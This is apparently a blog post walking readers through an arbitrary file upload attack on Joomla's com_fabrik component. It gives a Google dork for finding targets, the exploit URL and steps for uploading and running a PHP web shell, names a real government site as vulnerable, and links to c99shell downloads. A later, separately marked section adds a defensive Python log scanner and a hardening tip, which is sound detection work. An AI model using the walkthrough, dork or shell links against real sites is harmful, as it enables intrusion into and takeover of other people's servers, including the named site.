Another one :)

We had a recent post, http://ustechnica.wordpress.com/category/security/joomla-jce-ecploit/, on one of the Joomla vulnerabilities.

Joomla’s com_fabrik component gives you the power to create forms and tables that run inside Joomla without requiring knowledge of MySQL and PHP. You can then feed your data into Google Maps, Charts or an AJAX-based calendar.

But it’s vulnerable :)

Let’s hit the road.

1. Google dork: inurl:index.php?option=com_fabrik

If you want to narrow down the search to .com domains or .com.au domains, just append “site:com.au” to the above Google dork.

Example: inurl:index.php?option=com_fabrik site:com.au (this will search for the com_fabrik vulnerability on .com.au websites)

2. Once you have the list of websites, replace the URL with the link shown below:

http://www.example.com.au/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. You’ll get something like this, and you can upload any file:

[Image: comfabrik]

4. Now upload any file and, once it succeeds, access the link of the uploaded file:

http://www.example.com.au/media/shell.php (shell.php is the name of the uploaded file)

5. Example of a vulnerable site:

http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1

6. You can download one of the files below and upload it through the com_fabrik vulnerability:

http://www.2shared.com/file/6yFs_FG_/c99shell.html

http://pastebin.com/tfhHcPE0
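
For site owners, the request pattern in steps 2 to 4 shows up clearly in web server logs. The following is an added example, not part of the original post: it scans Apache combined-format access logs for requests to the com_fabrik import view and for PHP scripts requested under /media/, then correlates the two by client IP. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (Apache combined format, documentation-range IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2013:10:01:02 +0000] "GET /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2013:10:01:40 +0000] "POST /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 HTTP/1.1" 200 734 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2013:10:02:05 +0000] "GET /media/shell.php HTTP/1.1" 200 4211 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2013:10:03:11 +0000] "GET /index.php?option=com_fabrik&view=form&formid=2 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Mar/2013:10:03:15 +0000] "GET /media/system/js/core.js HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
MEDIA_SCRIPT_RE = re.compile(r"/media/[^?]*\.(php\d?|phtml)$", re.I)

def classify(target):
    """'import' for the com_fabrik import view, 'media_php' for a script under /media/."""
    url = urlsplit(target)
    query = {k: [v.lower() for v in vs] for k, vs in parse_qs(url.query).items()}
    if "com_fabrik" in query.get("option", []) and (
            "import" in query.get("view", []) or "import" in query.get("c", [])):
        return "import"
    if MEDIA_SCRIPT_RE.search(url.path):
        return "media_php"
    return None

def scan(log_text):
    """Return (alerts, correlated): alerts are (ip, kind, method, target, status);
    correlated holds IPs that hit the import view and later a script under /media/."""
    alerts, importers, correlated = [], set(), set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, method, target, status = m.groups()
        kind = classify(target)
        if kind is None:
            continue
        alerts.append((ip, kind, method, target, int(status)))
        if kind == "import":
            importers.add(ip)
        elif ip in importers:
            correlated.add(ip)
    return alerts, correlated

if __name__ == "__main__":
    alerts, correlated = scan(SAMPLE_LOG)
    for alert in alerts:
        print(alert)
    print("import followed by /media/ script from:", sorted(correlated))
```

Any IP in the correlated set warrants a check of the media directory for unexpected script files; denying script execution under that directory in the web server configuration removes the final step.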